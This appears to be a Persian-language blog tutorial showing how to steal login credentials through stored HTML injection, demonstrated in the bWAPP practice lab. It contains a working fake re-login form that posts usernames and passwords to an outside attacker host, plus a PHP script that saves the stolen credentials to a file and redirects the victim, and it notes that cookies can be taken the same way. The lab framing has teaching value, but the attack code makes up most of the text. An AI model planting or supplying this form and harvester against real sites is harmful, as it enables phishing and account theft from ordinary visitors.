سلام دوستان، اکثر شما سؤال کرده اید که چگونه می توانیم با استفاده از آسیب پذیری تزریق HTML اطلاعات حساس را به دست آوریم؟ بنابراین در اینجا می خواهیم یک تکنیک بسیار ساده را به شما نشان دهیم که با استفاده از آن یک مهاجم می تواند اعتبار کاربر یا داده های حساس را بدست آورد.
معرفی کوتاه HTML Injection چیست؟
تزریق HTML نوعی تزریق است که وقتی کاربر قادر به کنترل یک نقطه ورودی در وب سایت است و می تواند کد HTML دلخواه خود را به یک نقطه آسیب پذیر وب سایت تزریق کند، رخ می دهد.
نقاط تزریق چیست؟
سایت های مختلف دارای فرم ثبت نام، نوار جستجو یا بخش نظرات هستند که مکان های مناسبی برای آزمایش تزریق html هستند. بنابراین در اینجا ما قصد داریم از محیط آزمایشگاهی bwapp به منظور آزمایش خود استفاده کنیم. بعد از انتخاب نوع حمله در محیط bwapp، کد زیر را در آن وارد می کنیم.
<p>Sorry,Please Login Again</p></br>
<form method="post" action="http://site.com/netk.php">
Username<input type="text" name="username"></br>
Password<input type="password" name="password"></br>
<input type="submit" value="Submit">
</form>
در تصویر بالا، مهاجم پیلود خود را از طریق باکس دیدگاه وارد می کند
پس از اجرای پیلود، هر کاربر که به وب سایت می رود، فرم ذخیره شده توسط مهاجم را دریافت می کند، که در تصویر زیر آورده شده است.
اکنون مهاجم باید منتظر بماند تا کاربر اطلاعات خود را وارد کند. اما مهاجمان چگونه اطلاعات وارد شده کاربران را دریافت می کنند؟ این سؤالی است که اگر کد بالا را به درستی بررسی کنید، پرونده ای به نام netk.php وجود دارد که در سرور مهاجمین میزبانی شده است. در netk.php یک فایل credentials.txt ایجاد شده که داده ها و اطلاعات به طور خودکار در آن پرونده قرار می گیرند.
<?php
file_put_contents("credentials.txt", "Account: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: http://example.com');
exit();
اکنون بعد از وارد کردن اطلاعات توسط کاربرد در فرم بالا، می توانید پرونده credentials.txt را بررسی کنید. که در تصویر زیر اطلاعات قربانی را میتوانید مشاهده کنید.
همچنین می توانید با استفاده از تزریق html کوکی قربانی را نیز دریافت کنید. امیدوارم که برای شما مفید واقع شود .
هنوز بررسیای ثبت نشده است.